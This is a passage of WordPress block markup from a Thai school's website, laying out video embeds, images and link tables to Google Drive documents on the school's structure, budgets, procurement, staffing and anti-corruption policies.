{\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=sharing\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 